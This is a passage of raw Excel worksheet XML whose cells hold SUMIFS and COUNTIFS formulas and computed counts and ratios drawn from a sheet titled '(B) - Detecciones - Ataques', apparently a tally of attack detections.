      <c r="AR58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>7</v>
      </c>
      <c r="AS58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>4</v>
      </c>
      <c r="AU58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>12</v>
      </c>
      <c r="AV58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>27</v>
      </c>
      <c r="AY58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>3</v>
      </c>
      <c r="BA58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>14</v>
      </c>
      <c r="BB58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>49453</v>
      </c>
      <c r="BD58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>3</v>
      </c>
      <c r="BG58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>396</v>
      </c>
      <c r="BI58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>1</v>
      </c>
      <c r="BJ58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>1</v>
      </c>
      <c r="BK58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>24</v>
      </c>
      <c r="BL58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>2</v>
      </c>
      <c r="BM58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>155160</v>
      </c>
      <c r="BN58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>9175</v>
      </c>
      <c r="BO58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>205</v>
      </c>
      <c r="BR58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>10</v>
      </c>
      <c r="BT58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>2</v>
      </c>
      <c r="BU58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>43</v>
      </c>
      <c r="BZ58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>133</v>
      </c>
      <c r="CA58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>4</v>
      </c>
      <c r="CG58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>3</v>
      </c>
      <c r="CI58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>33</v>
      </c>
      <c r="CJ58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>13</v>
      </c>
      <c r="CL58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>171</v>
      </c>
      <c r="CN58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>13</v>
      </c>
      <c r="CP58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>43</v>
      </c>
      <c r="CQ58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>3</v>
      </c>
      <c r="CR58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>800</v>
      </c>
      <c r="CT58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>4</v>
      </c>
      <c r="CU58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>1</v>
      </c>
      <c r="CW58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>10</v>
      </c>
      <c r="CY58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>32</v>
      </c>
      <c r="CZ58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>7</v>
      </c>
      <c r="DE58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>8</v>
      </c>
      <c r="DF58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>475</v>
      </c>
      <c r="DI58" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>5507</v>
      </c>
      <c r="DJ58" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EN3:$EN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>15</v>
      </c>
      <c r="DK58" s="271"/>
      <c r="DO58" s="279"/>
      <c r="DP58" s="271"/>
      <c r="DQ58" s="271"/>
      <c r="DR58" s="271"/>
      <c r="DS58" s="271"/>
      <c r="DT58" s="271"/>
      <c r="DU58" s="271"/>
      <c r="DV58" s="271"/>
      <c r="DW58" s="271"/>
      <c r="DX58" s="271"/>
      <c r="DY58" s="271"/>
      <c r="DZ58" s="271"/>
      <c r="EA58" s="271"/>
      <c r="EB58" s="271"/>
      <c r="EC58" s="271"/>
      <c r="ED58" s="280"/>
      <c r="EG58" s="279"/>
      <c r="EH58" s="271"/>
      <c r="EI58" s="358" t="s">
        <v>664</v>
      </c>
      <c r="EJ58" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI37,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S35 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="EK58" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI37,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S35 &amp; "*")</f>
        <v>3</v>
      </c>
      <c r="EL58" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI37,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S35 &amp; "*")</f>
        <v>6</v>
      </c>
      <c r="EM58" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI37,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S35 &amp; "*")</f>
        <v>6</v>
      </c>
      <c r="EN58" s="360">
        <f t="shared" si="37"/>
        <v>6</v>
      </c>
      <c r="EO58" s="364"/>
      <c r="EP58" s="456">
        <f t="shared" si="40"/>
        <v>0.09230769231</v>
      </c>
      <c r="EQ58" s="457">
        <f t="shared" si="41"/>
        <v>0.9076923077</v>
      </c>
      <c r="ER58" s="427">
        <f t="shared" si="42"/>
        <v>0.8</v>
      </c>
      <c r="ES58" s="427">
        <f t="shared" si="43"/>
        <v>0.85</v>
      </c>
      <c r="ET58" s="427">
        <f t="shared" si="48"/>
        <v>0.8</v>
      </c>
      <c r="EU58" s="364"/>
      <c r="EV58" s="358" t="s">
        <v>209</v>
      </c>
      <c r="EW58" s="465">
        <f t="shared" ref="EW58:EZ58" si="52">IF(EJ36=0,"-",EJ57/EJ36)</f>
        <v>0</v>
      </c>
      <c r="EX58" s="465">
        <f t="shared" si="52"/>
        <v>0.2272727273</v>
      </c>
      <c r="EY58" s="465">
        <f t="shared" si="52"/>
        <v>0.3428571429</v>
      </c>
      <c r="EZ58" s="466">
        <f t="shared" si="52"/>
        <v>0.1547619048</v>
      </c>
      <c r="FA58" s="474"/>
      <c r="FK58" s="445"/>
      <c r="FL58" s="359"/>
      <c r="FM58" s="359"/>
      <c r="FN58" s="359"/>
      <c r="FO58" s="359"/>
      <c r="FP58" s="359"/>
      <c r="FY58" s="379" t="s">
        <v>357</v>
      </c>
      <c r="FZ58" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*"))</f>
        <v>0.1</v>
      </c>
      <c r="GA58" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*"))</f>
        <v>0.2</v>
      </c>
      <c r="GC58" s="379" t="s">
        <v>357</v>
      </c>
      <c r="GD58" s="368">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*"))</f>
        <v>0.3</v>
      </c>
      <c r="GE58" s="369">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY58)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY58 &amp; "*"))</f>
        <v>0.4</v>
      </c>
    </row>
    <row r="59">
      <c r="J59" s="277"/>
      <c r="K59" s="349"/>
      <c r="L59" s="350"/>
      <c r="M59" s="350"/>
      <c r="N59" s="351"/>
      <c r="O59" s="278"/>
      <c r="Q59" s="271"/>
      <c r="R59" s="352" t="s">
        <v>2525</v>
      </c>
      <c r="S59" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>28629</v>
      </c>
      <c r="T59" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>27776</v>
      </c>
      <c r="U59" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>143</v>
      </c>
      <c r="V59" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>70</v>
      </c>
      <c r="W59" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>29</v>
      </c>
      <c r="X59" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>49460</v>
      </c>
      <c r="Y59" s="353">
